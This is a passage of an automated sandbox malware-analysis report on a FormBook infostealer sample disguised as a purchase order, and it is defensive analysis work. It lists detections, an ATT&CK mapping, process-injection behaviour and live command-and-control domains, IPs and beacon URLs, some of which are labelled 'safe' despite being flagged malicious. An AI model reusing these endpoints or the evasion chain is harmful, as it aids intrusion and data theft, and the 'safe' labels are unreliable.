            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1Input Capture1Virtualization/Sandbox Evasion4Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion4Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing22Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 356494 Sample: PO_210223.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 12 other signatures 2->52 10 PO_210223.exe 7 2->10         started        process3 file4 32 C:\Users\user\AppData\Roaming\kwqifureL.exe, PE32 10->32 dropped 34 C:\Users\...\kwqifureL.exe:Zone.Identifier, ASCII 10->34 dropped 36 C:\Users\user\AppData\Local\...\tmp33D2.tmp, XML 10->36 dropped 38 C:\Users\user\AppData\...\PO_210223.exe.log, ASCII 10->38 dropped 62 Detected unpacking (changes PE section rights) 10->62 64 Detected unpacking (overwrites its own PE header) 10->64 66 Tries to detect virtualization through RDTSC time measurements 10->66 68 Injects a PE file into a foreign processes 10->68 14 PO_210223.exe 10->14         started        17 schtasks.exe 1 10->17         started        signatures5 process6 signatures7 70 Modifies the context of a thread in another process (thread injection) 14->70 72 Maps a DLL or memory area into another process 14->72 74 Sample uses process hollowing technique 14->74 76 Queues an APC in another process (thread injection) 14->76 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 40 www.pophazard.com 204.11.56.48, 49763, 80 CONFLUENCE-NETWORK-INCVG Virgin Islands (BRITISH) 19->40 42 sll.nnu.pw 103.66.59.142, 49765, 80 CNSERVERSUS Hong Kong 19->42 44 3 other IPs or domains 19->44 54 System process connects to network (likely due to code injection or exploit) 19->54 25 ipconfig.exe 19->25         started        signatures10 process11 signatures12 56 Modifies the context of a thread in another process (thread injection) 25->56 58 Maps a DLL or memory area into another process 25->58 60 Tries to detect virtualization through RDTSC time measurements 25->60 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO_210223.exe31%VirustotalBrowse
            PO_210223.exe43%ReversingLabsByteCode-MSIL.Spyware.Noon
            PO_210223.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\kwqifureL.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\kwqifureL.exe43%ReversingLabsByteCode-MSIL.Spyware.Noon

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.PO_210223.exe.890000.0.unpack100%AviraHEUR/AGEN.1134873Download File
            9.2.PO_210223.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            kaieteurny.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cnal0%Avira URL Cloudsafe
            http://www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/pics/12471/libgh.png)0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.carterandcone.comig0%Avira URL Cloudsafe
            http://www.246835.com/ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb0%Avira URL Cloudsafe
            http://www.carterandcone.comva9y0%Avira URL Cloudsafe
            http://www.carterandcone.comcy0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
            http://www.fonts.comc0%URL Reputationsafe
            http://www.fonts.comc0%URL Reputationsafe
            http://www.fonts.comc0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)0%Avira URL Cloudsafe
            http://www.tiro.comlic0%URL Reputationsafe
            http://www.tiro.comlic0%URL Reputationsafe
            http://www.tiro.comlic0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
            http://www.kaieteurny.com/ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb0%Avira URL Cloudsafe
            www.000666dy.com/ntg/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
            http://www.carterandcone.comk0%URL Reputationsafe
            http://www.carterandcone.comk0%URL Reputationsafe
            http://www.carterandcone.comk0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.zhongyicts.com.cniy0%Avira URL Cloudsafe
            http://www.carterandcone.comint0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://i3.cdn-image.com/__media__/pics/12471/libg.png)0%Avira URL Cloudsafe
            http://www.tiro.comal0%Avira URL Cloudsafe
            http://www.monotype.0%URL Reputationsafe
            http://www.monotype.0%URL Reputationsafe
            http://www.monotype.0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwW0%Avira URL Cloudsafe
            http://www.tiro.com8i0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kaieteurny.com
            		23.229.197.103
            		truetrueunknown
            sll.nnu.pw
            		103.66.59.142
            		truetrue
              		unknown
              www.pophazard.com
              		204.11.56.48
              		truetrue
                		unknown
                www.246835.com
                		unknown
                		unknowntrue
                  		unknown
                  www.kaieteurny.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAbtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.246835.com/ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAbtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.kaieteurny.com/ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAbtrue
                    • Avira URL Cloud: safe
                    		unknown
                    www.000666dy.com/ntg/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cnalPO_210223.exe, 00000000.00000003.647755183.0000000008255000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designers/?PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bThePO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers?PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                          		high
                          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comexplorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.comPO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersQPO_210223.exe, 00000000.00000003.654377069.0000000008285000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersivaPO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmpfalse
                                		high
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssPO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpfalse
                                  		high
                                  http://i3.cdn-image.com/__media__/pics/12471/arrow.png)ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sajatypeworks.comPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cThePO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
